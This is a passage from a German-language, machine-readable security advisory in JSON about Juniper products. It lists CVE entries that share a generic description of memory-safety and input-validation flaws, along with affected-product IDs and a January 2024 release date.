"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21596"
},
{
"cve": "CVE-2024-21595",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21595"
},
{
"cve": "CVE-2024-21594",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21594"
},
{
"cve": "CVE-2024-21591",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21591"
},
{
"cve": "CVE-2024-21589",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21589"
},
{
"cve": "CVE-2024-21587",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21587"
},
{
"cve": "CVE-2024-21585",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2024-21585"
},
{
"cve": "CVE-2023-38802",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-38802"
},
{
"cve": "CVE-2023-38408",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-38408"
},
{
"cve": "CVE-2023-3817",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-3817"
},
{
"cve": "CVE-2023-36842",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-36842"
},
{
"cve": "CVE-2023-3446",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-3446"
},
{
"cve": "CVE-2023-3341",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-3341"
},
{
"cve": "CVE-2023-32360",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-32360"
},
{
"cve": "CVE-2023-32067",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-32067"
},
{
"cve": "CVE-2023-2828",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-2828"
},
{
"cve": "CVE-2023-2650",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-2650"
},
{
"cve": "CVE-2023-26464",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-26464"
},
{
"cve": "CVE-2023-24329",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-24329"
},
{
"cve": "CVE-2023-23920",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-23920"
},
{
"cve": "CVE-2023-23918",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2023-23918"
},
{
"cve": "CVE-2023-23454",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
